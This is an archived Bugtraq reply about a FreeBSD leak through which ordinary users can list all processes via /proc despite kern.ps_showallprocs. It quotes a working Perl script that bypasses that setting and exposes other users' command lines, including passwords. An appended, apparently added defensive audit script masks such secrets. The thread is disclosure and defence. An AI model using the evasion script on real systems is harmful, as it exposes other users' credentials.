Bugtraq mailing list archives

Re: ps information leak in FreeBSD


From: Jez Hancock <jez.hancock () munk nu>
Date: Tue, 7 Jan 2003 09:18:00 +0000

On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but a
> normal user can see all processes on the box using e.g. /bin/ps;
This topic was addressed on the freebsd-security list a while back, where
someone also noted that all user process information can be obtained by
regular users, even with the sysctl flag 'kern.ps_showallprocs' set, simply
by looking at the contents of /proc.  The following script was also
posted by someone to demonstrate this:

#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users' process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didn't take any skill.  it's basically an output format]
#
# Tested on FreeBSD 4.5-RC.
#
# Cleaned up for this archive: strict/warnings, no shelling out to ls/cat,
# numeric-only PID matching, and a fixed column rollover.  Same output
# format as the original; only needs procfs mounted on /proc.

use strict;
use warnings;

my $WIDTH  = 80;   # terminal width
my $INDENT = 32;   # column where [FILE/ARGS] starts; continuation lines align here

printf "%-11s %-11s %-7s %s\n", '[USER]', '[GROUP]', '[PID]', '[FILE/ARGS]';

opendir(my $dir, '/proc') or die "opendir /proc: $!";
# Only purely numeric entries are PIDs (the original matched any name containing a digit).
my @pids = sort { $a <=> $b } grep { /^\d+$/ } readdir($dir);
closedir($dir);

foreach my $pid (@pids) {
    # /proc/<pid>/file is a symlink to the executable and is owned by the
    # process's uid/gid; lstat + readlink replace the original's parsing of
    # `ls -al` output (the link target is "unknown" for kernel processes).
    my @st = lstat("/proc/$pid/file") or next;
    my $target = readlink("/proc/$pid/file");
    next unless defined $target;
    my $user  = getpwuid($st[4]);
    my $group = getgrgid($st[5]);
    $user  = $st[4] unless defined $user;
    $group = $st[5] unless defined $group;
    show_proc($user, $group, $pid, $target);
}
exit(0);

# Print one process line: user, group, pid, then its argument list.
sub show_proc {
    my ($user, $group, $pid, $target) = @_;
    return unless -e "/proc/$pid/cmdline";
    open(my $fh, '<', "/proc/$pid/cmdline") or return;
    local $/;                       # slurp: argv is NUL-separated
    my $args = <$fh>;
    close($fh);
    $args = '' unless defined $args;
    $args =~ s/[^[:print:]]/ /g;    # NULs and other non-printables become spaces
    $args =~ s/\s+$//;
    if ($target eq 'unknown') {
        # Kernel processes have no executable; show the name in parentheses like ps(1).
        $args =~ s/\s+//g;
        $args = "($args)";
    }
    my $line = sprintf("%-11s %-11s %-7s %s", $user, $group, $pid, $args);
    # Wrap long lines: the first $WIDTH columns, then $WIDTH-$INDENT columns per
    # continuation line, indented to the [FILE/ARGS] column.
    print substr($line, 0, $WIDTH, ''), "\n";
    while (length $line) {
        print ' ' x $INDENT, substr($line, 0, $WIDTH - $INDENT, ''), "\n";
    }
    return 0;
}

I believe someone (the last poster in this thread?) also posted a patch on the
same list, freebsd-security.

It's annoying in that I see a lot of users running mysql with the -u and -p options:

mysql -u user -p mypassword

on the command line, thinking that this info will not show up in ps listings when
ps is run by other users.  Ho hum...

Regards,

Jez Hancock
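The mysql point above, turned into a quick audit an administrator can run over `ps axww -o user,pid,command` output. This is an added example, not part of the thread; find_cmdline_secrets is a name chosen here. It flags mysql's -pSECRET and -p SECRET forms and --password= on any command, and masks the value so the audit output does not leak it a second time.

```shell
#!/bin/sh
# Added example (not from the thread): audit ps(1) output for passwords passed
# as arguments, which any local user can read via ps or /proc as shown above.
# Input: "USER PID COMMAND..." lines, e.g. from `ps axww -o user,pid,command`.
# Output: only the offending lines, with the secret replaced by "***".
# find_cmdline_secrets is a name chosen for this example.
find_cmdline_secrets() {
    sed -E -n \
        -e 's/--password=[^[:space:]]+/--password=***/g' \
        -e '/mysql/ s/(^|[[:space:]])-p[[:space:]]+([^[:space:]-][^[:space:]]*)/\1-p ***/g' \
        -e '/mysql/ s/(^|[[:space:]])-p([^[:space:]-][^[:space:]]*)/\1-p***/g' \
        -e 't print' -e 'd' -e ':print' -e 'p'
}

# Live use:  ps axww -o user,pid,command | find_cmdline_secrets
# Constructed sample input for a dry run:
printf '%s\n' \
    'bob 1234 mysql -u bob -p mypassword' \
    'bob 1235 mysql -ubob -ps3cret db' \
    'alice 42 pg_dump --password=hunter2 mydb' \
    'root 1 /sbin/init' \
    'bob 77 find / -print' \
    | find_cmdline_secrets
```

A bare `mysql -p` followed by another option (interactive prompt) is not flagged, and the -p heuristics are gated on the word mysql so that options like find's -print do not trigger them.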
